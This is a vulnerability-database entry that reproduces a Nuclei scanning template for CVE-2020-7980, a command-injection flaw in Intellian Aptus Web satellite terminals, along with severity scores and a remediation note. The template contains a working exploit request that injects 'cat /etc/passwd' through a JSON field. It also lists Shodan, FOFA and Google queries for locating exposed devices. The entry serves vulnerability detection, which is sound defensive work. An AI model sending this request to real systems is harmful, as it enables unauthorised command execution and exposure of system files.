Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-7980
HistoryApr 19, 2022 - 9:10 p.m.

Satellian Intellian Aptus Web <= 1.24 - Remote Command Execution

2022-04-1921:10:53
ProjectDiscovery
github.com
23
cve2020
intellian
aptus_web
packetstorm
satellian
rce
execution
os_commands
remote_attackers
security_vulnerability

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.8

Confidence

High

EPSS

0.968

Percentile

99.7%

‘Intellian Aptus Web 1.24 allows remote attackers to execute arbitrary OS commands via the Q field within JSON data to the cgi-bin/libagent.cgi URI. NOTE: a valid sid cookie for a login to the intellian default account might be needed.’

id: CVE-2020-7980

info:
  name: Satellian Intellian Aptus Web <= 1.24 - Remote Command Execution
  author: ritikchaddha
  severity: critical
  description: 'Intellian Aptus Web 1.24 allows remote attackers to execute arbitrary OS commands via the Q field within JSON data to the cgi-bin/libagent.cgi URI. NOTE: a valid sid cookie for a login to the intellian default account might be needed.'
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
  remediation: |
    Upgrade to a patched version of Satellian Intellian Aptus Web (version > 1.24).
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-7980
    - https://sku11army.blogspot.com/2020/01/intellian-aptus-web-rce-intellian.html
    - https://github.com/Xh4H/Satellian-CVE-2020-7980
    - http://packetstormsecurity.com/files/156143/Satellian-1.12-Remote-Code-Execution.html
    - https://github.com/0xT11/CVE-POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-7980
    cwe-id: CWE-78
    epss-score: 0.96876
    epss-percentile: 0.99703
    cpe: cpe:2.3:a:intelliantech:aptus_web:1.24:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: intelliantech
    product: aptus_web
    shodan-query:
      - http.title:"Intellian Aptus Web"
      - http.title:"intellian aptus web"
    fofa-query: title="intellian aptus web"
    google-query: intitle:"intellian aptus web"
  tags: cve2020,cve,intellian,aptus,packetstorm,satellian,rce,intelliantech

http:
  - raw:
      - |
        POST /cgi-bin/libagent.cgi?type=J HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Cookie: ctr_t=0; sid=123456789

        {"O_": "A", "F_": "EXEC_CMD", "S_": 123456789, "P1_": {"Q": "cat /etc/passwd", "F": "EXEC_CMD"}, "V_": 1}

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502203953b96807b577b7f0ec89c51f1ea7d6dd45ffbb5e65d74157e4699f2b185cfb022100a272b0590f81337809b71e50724451e7214ad4c1ec109342aefea04c4e76c43b:922c64590222798bb761d5b6d8e72950

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.8

Confidence

High

EPSS

0.968

Percentile

99.7%